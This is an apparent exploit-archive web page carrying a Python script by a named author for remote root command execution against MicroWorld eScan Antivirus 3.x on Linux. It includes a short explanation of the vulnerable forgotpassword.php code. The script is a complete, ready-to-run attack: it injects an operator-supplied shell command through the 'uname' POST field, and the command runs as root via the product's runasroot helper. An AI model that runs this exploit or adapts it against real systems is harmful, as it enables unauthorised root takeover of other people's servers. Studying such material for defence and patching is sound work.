首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
MicroWorld eScan Antivirus < 3.x Remote Root Command Execution
来源:Sa.attacker@gmail.com 作者:Mohammed 发布时间:2010-03-15  

#!/usr/bin/env python
import sys
from socket import *

#auther: Mohammed almutairi
#(Sa.attacker@gmail.com)
"""
MicroWorld eScan Antivirus < 3.x  Remote Root Command Execution
Package MWADMIN package vulnerabilities (linux)
The Base Packages (MWADMIN and MWAV) must be installed before eScan
Link:
http://www.escanav.com/english/content/products/escan_linux/linux_products.asp
infcted: aLL version 3.X eScan linux
1-Escan for Linux Desktop
2-Escan for Linux file Servers
3-MailScan for Linux and webscan
Tested On RedHat  and Fedora
ULTRA PRIV8 :)

Description:

From /opt/MicroWorld/var/www/htdocs/forgotpassword.php:
include("common_functions.php");  <---> (1)

if ($_POST['forgot'] == "Send Password")
{
        $user = $_POST["uname"]; <--->(2) insecure:(


vulnerable code in forgotpassword.php and common_functions.php
in (1) $runasroot = "/opt/MicroWorld/sbin/runasroot";
we can injection through via the file forgotpassword.php As you can see (2)
with  remote root Command Execution
>> eScan.py www.***.com
eScan@/bin/sh:$Sa$ => reboot
[*] Done! sent to: www.***.com
"""

def xpl():
 if len(sys.argv) < 2:
                print "[*] MicroWorld eScan Antivirus Remote Root Command Execution"
                print "[*] exploited by Mohammed almutairi"
  print "[*] usage: %s host" % sys.argv[0]
  return

 host = sys.argv[1]
 port = 10080 # default port
 cmd = raw_input("eScan@/bin/sh:$Sa$ => ")
 sock=socket(AF_INET, SOCK_STREAM)
 sock.connect((host,port))
        sh="/opt/MicroWorld/sbin/runasroot /bin/sh -c '%s'" % cmd

        sa= "uname=;%s;" %sh # (;sh;)  ---> Here Play See to ^(2)^
        sa+= "&forgot=Send+Password"
       
        s="POST /forgotpassword.php HTTP/1.1\r\n"
        s+="Host: %s:%d\r\n"%(host, port)
        s+="User-Agent: */*\r\n"
        s+="Accept: ar,en-us;q=0.7,en;q=0.3\r\n"
        s+="Content-Type: application/x-www-form-urlencoded\r\n"
        s+="Content-Length: %d \r\n\r\n"%len(sa)
        s+=sa

 sock.sendall(s)
 print "[*] Done! sent to: %s" % host
 sock.close()

if __name__=="__main__":
        xpl()
 sys.exit(0)


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Multiple PHP Functions - Local
·GOM Player v2.1.21 avi File Do
·Mackeitone Media Player (.m3u
·Media Player V6.4.9.1 with K-L
·Yahoo Player v1.0 (.m3u) Buffe
·httpdx v1.5.3b Multiple - Remo
·Media Player classic StatsRead
·Oracle 11gR2 Multiple Remote P
·FreeBSD and OpenBSD 'ftpd' NUL
·Embedthis Appweb 3.1.2 Remote
·win32/xp pro sp3 (calc) 57 byt
·Ruby on Rails 'protect_from_fo
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved